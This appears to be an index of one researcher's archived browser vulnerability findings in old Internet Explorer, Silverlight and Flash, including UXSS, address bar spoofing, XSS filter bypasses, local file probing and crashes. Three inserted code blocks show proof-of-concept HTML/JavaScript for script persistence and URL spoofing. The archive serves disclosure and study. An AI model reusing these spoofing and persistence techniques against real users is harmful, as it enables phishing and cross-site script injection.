A straightforward crash: if any JavaScript prototype was modified — even just adding an arbitrary property like HTMLDivElement.prototype.ANYTHING = 777 — and then the browser's Properties dialog was...
IE8 Compatibility View Redirect Address Bar Spoof
IE8 introduced a "Compatibility View" button in the address bar. I found that when this button was clicked on a page that then performed a redirect to a page without a Content-Type header or DOCTYPE,...
IE8 XSS Filter Bypass via Nested IFRAMEs
IE8 introduced a built-in XSS filter that was supposed to detect reflected XSS attempts and neutralize them. After playing around for a while, I found a bypass: if the XSS payload was delivered not...
IE8 url:file:// Patch Bypass with Extra Characters
After the url:file:/// trick was patched in an earlier fix, I tried some simple variations to see whether the fix was complete. It turned out that inserting any extra characters between url and the...
Silverlight 2 Beta Security Research
This folder contains research materials from a Silverlight 2 Beta security review, including a detailed penetration testing document (Silverlight PenTest.docx) and four proof-of-concept archives...
IE8 Resident Script via Cached execScript and htmlFile
This was a variation of the resident script technique adapted for IE8, where the previous iframe-based approaches had been patched. After playing around for a while, I found that you could cache the...
6on6: A Personal Browser Security Issue Tracker
The 6on6 folder was a small personal tool — an HTML page backed by an #default#homePage behavior and userData persistence — that I used to track and quickly test browser security issues. The...
postMessage Security Research Notes
This folder contains a research document (postMessage penTest.docx) covering security considerations around the window.postMessage API, which was relatively new at the time. The notes explored...
XMLHttpRequest Security Quirks: about:blank, Multiple Redirects, and responseXML Lifetime
Three separate XHR oddities I found while exploring how Internet Explorer's Microsoft.XMLHTTP ActiveX object handled unusual situations. None of them alone was a dramatic vulnerability, but together...
XSS in a Banking Application
This folder contains a proof-of-concept for a cross-site scripting vulnerability found in a banking application. The details are archived in XSS_BOA.zip. The finding was part of broader research into...
XAML Frame + url:file:// Combo for Local Zone Code Execution
This was a combination of two separate issues working together. First: IE accepted url:file:// as a valid iframe source, which loaded local files into an iframe from an internet-zone page. Second: a...
Safari Resident Script: onunload Navigation Interception and Banner Hijacking
After the IE resident script work, I was curious whether the same class of issues appeared in Safari. It turned out that Safari had its own onunload quirk: during the unload event, you could call...
BlueHat Demos: Resident Scripts, Banner Hijacking, UXSS, and Ghost
These are the proof-of-concept files I prepared for a BlueHat presentation. They cover four related techniques built around the idea of a "resident script" — JavaScript that survives a full page...
Kevin's XML Resident Script POC
This folder contains evidence of a resident script technique discovered independently around the same time, using XML as the persistence vector rather than the HTML/iframe approach explored in other...
Popup Bypass Using WMP
The Windows Media Player ActiveX control exposed a launchURL method that could open a new browser window without triggering the pop-up blocker. The method was intended to let the media player open...
IE7 Resident - opener, createElement, OBJECT
A very clean residency technique: creating an OBJECT TYPE="text/html" element via document.createElement and storing it in window.opener keeps the referenced document alive and running after the page...
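The three steps stated in that entry, written out as an added illustration that is not one of the archived PoC files: an OBJECT start tag passed to IE's createElement, the element assigned to window.opener, and the window navigated away. The DATA target (resident.html), the appendChild call and the destination URL are assumptions made for the illustration; the entry does not say whether the element has to be in the tree before it is cached.

```html
<!-- Added illustration of the opener/createElement/OBJECT residency entry; not an archived PoC.
     Assumptions (not stated in the entry): the OBJECT loads a same-origin resident.html that
     holds the script meant to keep running, and it is inserted into the tree before being cached. -->
<html>
<body>
<script type="text/javascript">
// IE accepts a complete start tag in createElement (IE-only syntax).
var resident = document.createElement(
    '<OBJECT TYPE="text/html" DATA="resident.html" WIDTH="0" HEIGHT="0">');
document.body.appendChild(resident);   // assumed: let the OBJECT load its document first

// window.opener is writable in IE and is not cleared when this window navigates,
// so the OBJECT, and the document it hosts, stays referenced and keeps running.
window.opener = resident;

// Navigate this window away; the script inside resident.html is still alive afterwards.
window.setTimeout(function () {
    location.href = "http://www.example.com/";   // assumed destination
}, 1000);
</script>
</body>
</html>
```

Anything resident.html does after the navigation (timers, DOM access through its own window) is the observable effect; the entry does not spell out what the hosted document did, so the illustration stops at keeping it alive.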
DoS: Silverlight Crash via Enumerator on userControl
Another brief one from the same Silverlight testing session. Passing the userControl object from the onLoad event into IE's Enumerator constructor would crash the browser immediately. The crash was...
Popup Blocker Bypass via Silverlight's Delayed HtmlPage.Window.Eval
This one surprised me. IE's popup blocker is supposed to block window.open() calls that don't originate from a direct user gesture. The expectation is that a setTimeout delay breaks that link. What I...
DoS: Silverlight Crash via innerHTML on Its Container
A short one. If you repeatedly overwrite the innerHTML of the <div> that contains a Silverlight control, IE would crash. The Silverlight object didn't even need to have a source — an empty control...
UXSS via Silverlight onLoad Argument Bypassing Cross-Origin Check
I was lucky to find this one while testing Silverlight 2.0 Beta. The normal way to access a Silverlight control's XAML DOM from JavaScript is through...
Flash Loading a Remote SWF Without User Interaction
After playing around for a while with Flash's allowScriptAccess and allowFullScreen parameters, I came across a way to have a Flash object load and interact with a remote SWF file on a different...
ExecWB IDM_PRINTPREVIEW Opens a Door to Many Tricks
I was lucky to find this one. While poking at IE's ExecWB method, I discovered that when you call it with the IDM_PRINTPREVIEW command on an iframe, the third parameter — normally a printer name — is...
XAML Frame + Hacked PDF = Pseudo Local Machine Zone
After playing around for a while with XAML's <Frame> element and some earlier PDF work, I noticed that loading an HTML page inside a XAML Frame seemed to inherit a surprisingly elevated security...
PDF Plugin: Loading Local Files via file:// Protocol Link
I was looking at how Adobe Acrobat Reader handled links embedded in PDF files when the PDF was loaded inside an IE iframe. I found that a PDF crafted with an internal link pointing to a file:/// URL...
UXSS Simplification (WOOBR 977211): Cached SWF Document Without Reload
Earlier UXSS variants using cached iframe documents required reloading the main page and using window.opener as the storage mechanism. I was looking for a simpler version and found one: by caching...
Vista RCE via XAML Frame + ExecWB PrintPreview
This one surprised me. By combining two techniques — loading HTML inside a XAML <Frame> element, and then using the ExecWB IDM_PRINTPREVIEW trick to open a privileged modal — it became possible to...
DoS: IE7 Crash via Cached SWF Document and res:// Protocol Navigation
I was applying the cached-Document technique to IE's internal res:// protocol URLs — specifically res://ieframe.dll/dnserror.htm, the DNS error page. After caching the Document of an SWF-loaded...
IE7: Infinite Window Spawning via Cached SWF Document and res:// Hash
On the same day as the res:// crash, I was experimenting with what happened when you appended a # fragment to the same res://ieframe.dll/dnserror.htm URL in the cached-document navigation. Instead of...
XAML Frame: Loading Local Images via file:// Protocol
Continuing the investigation of what XAML Frame pages could access that standard Internet Zone pages could not, I found that <img> tags with file:/// URLs loaded successfully inside a XAML Frame. A...
XAML Frame: Checking Local File Existence via Script Tag src
I was looking at what local file access XAML Frame pages had compared to standard Internet Zone HTML pages. I found that inside a XAML Frame, you could set the src of a <script> element to a local...
XAML Frame Bypasses IE7 window.prompt Gold Bar Restriction
IE7 introduced a security enhancement that blocked window.prompt in the Internet Zone and replaced it with the gold Information Bar, specifically to prevent phishing sites from mimicking login...
UXSS (SOP Bypass Attempt): IE 5.5 document.URL Set to about: Script
I was exploring a subtle difference between location.href = "about:blank" and document.URL = "about:blank" when called from inside an iframe. They behave differently in terms of which security domain...
UXSS via XAML Frame: document.URL about: Script Injection
While exploring the document.URL = "about:..." quirk from the IE 5.5 research, I found that XAML <Frame> elements in IE behaved differently from ordinary HTML iframes. Inside a XAML Frame, the about:...
MSRC 7571 Variation: Another Method to Run Remote Files
While working on MSRC case 7571 — which involved using a vulnerable launchURL method to run local executables — I found a variation that went further: it was possible to use the same technique to...
DoS: createPopup Chain with Windows Media Player innerHTML
I was exploring unusual combinations of IE-specific APIs and found that creating a createPopup() from inside another createPopup()'s parentWindow, and then setting the inner popup's innerHTML to...
UXSS: IE7 + Flash 9 getURL GET Method Allows Cross-Origin Script Injection
I had previously reported a UXSS using Flash's getURL with the POST method. When Flash 9 shipped, I checked whether the GET method variant — which had been fixed in Flash 6 through 8 — was still...
UXSS Using Flash getURL POST Method
This one surprised me. I noticed that Flash's getURL() function, when called with the "POST" method and a javascript: URL as the target, could execute script inside an IFRAME on a different domain....
Flash Plugin: Checking Whether a Local File Exists via readyState
After finding the Office XP ActiveX file-existence check, I wondered whether the Flash plugin had a similar observable side channel. It did. By setting the Movie property of a Flash <object> element...
IE6: Checking Whether a Local File Exists via Dashboard ActiveX
I was looking at ActiveX controls that were marked safe for scripting but had interesting side channels. The MSDDSC.DDSC Dashboard Components control (installed with Office XP) exposed an Export...
URL Spoofing via onbeforeunload — Vista-Compatible Variant
The XP-only URL spoof using onbeforeunload and history.go(0) stopped working on Windows Vista. After some digging, I found a small adjustment that restored the behavior on Vista: instead of calling...
URL Spoofing via onbeforeunload and history.go(0)
I was looking at address bar spoofing scenarios and found that combining window.onbeforeunload with history.go(0) produced a clean URL spoof on Windows XP. When a user typed a new URL and pressed...
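The combination named in that entry, as an added illustration rather than one of the archived PoC files. The handler is the whole technique; the visible page content is a placeholder, and the entry's own account of the user action is cut off above, so the comment describes only what the two calls do.

```html
<!-- Added illustration of the onbeforeunload + history.go(0) spoof entry; not an archived PoC.
     Nothing here is specific to any site being spoofed: the handler is the entire technique. -->
<html>
<body>
<p>Page that stays on screen while the address bar shows something else.</p>
<script type="text/javascript">
// onbeforeunload fires when this window is about to navigate away, including when the user
// enters a different URL in the address bar. Reloading from inside the handler replaces the
// pending navigation with a reload of this page, which is what produced the XP address bar
// spoof described in the entry (the Vista-compatible variant is a separate entry).
window.onbeforeunload = function () {
    history.go(0);
};
</script>
</body>
</html>
```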
Resident Script via Cached execScript from an Iframe
I was curious whether caching execScript — the IE-specific method for running code in a window's context — from an iframe would survive a page reload in the same way that window.open had. It did. By...
UXSS Variation: Cached window.open with setCapture Across All Pages
The day after finding the resident cached window.open technique, I started thinking about combining it with a setCapture trick from an earlier UXSS case. The result was something a bit more...
Resident Script via Cached window.open from an Iframe
I was looking at what happened when you cached method references from iframe contexts rather than document objects. It turned out that grabbing the window.open method from an iframe and stashing it...
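The caching pattern shared by this entry and the execScript entry above, as an added illustration that is not one of the archived PoC files: take the method reference from the iframe's window rather than from its document, keep it somewhere that outlives a reload, and call it again after the page has reloaded. Parking the reference in window.opener is an assumption borrowed from the cached-Document variants elsewhere in this collection; the same-origin about:blank iframe and the alert payload are also assumptions.

```html
<!-- Added illustration of the cached-method residency entries (window.open and execScript
     from an iframe); not an archived PoC. Assumptions: the reference is stored in window.opener,
     which IE keeps across location.reload(), and the iframe is a same-origin about:blank. -->
<html>
<body>
<iframe id="f" src="about:blank"></iframe>
<script type="text/javascript">
var frameWin = document.getElementById("f").contentWindow;

if (!window.opener) {
    // First load: cache the iframe window's execScript (window.open is grabbed the same way)
    // and stash it in opener so the reference survives the reload of this page.
    window.opener = frameWin.execScript;
    location.reload();
} else {
    // After the reload the iframe has been recreated, but the cached reference taken from the
    // torn-down iframe window is still callable, which is the "resident" behaviour the entries describe.
    window.opener("alert('cached execScript still runs after reload: ' + document.URL)");
}
</script>
</body>
</html>
```

IE's host-object methods remain bound to the window they were taken from, which is why a bare reference can be invoked without its original object; that binding is what makes the stale reference useful once the iframe it came from no longer exists.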
DoS - Frozen IE - userControl Run Two Forms
This doesn't crash IE — it freezes it completely. The browser stops responding to input, can't be minimized, maximized, or closed, and disappears from the Alt+Tab list. It's alive but halted,...
DoS: Cached Non-HTML Document Reloaded Twice
The day after finding the UXSS variant using a cached iframe Document, I was curious what would happen if you navigated the same stale reference a second time in quick succession. It turned out that...
UXSS via Cached Non-HTML Document and Page Reload
I was playing around with how IE handled the Document object of iframes loaded with non-HTML content — things like SWF, MHT, or XAML files. After some persistence, I found that caching that Document...
DoS - IE7 Close Browser via Enumerator Application
Passing the Application property of an IFRAME to the Enumerator constructor closes the entire browser — all tabs, no prompts — on IE7. The Application object is the top-level IWebBrowser2 interface,...
UXSS - Cached contentWindow frameElement
Another entry in the frameElement UXSS collection, but this one uses pure HTML — no Flash, XAML, or XML. The trick is to cache an IFRAME's contentWindow, then destroy the IFRAME with outerHTML, and...
UXSS - HTC setCapture Variation - Case 6445
Another variation of the setCapture() UXSS (originally case #6445). The original used setCapture() on the top window; the first variation used it inside a same-domain IFRAME. This one moves the...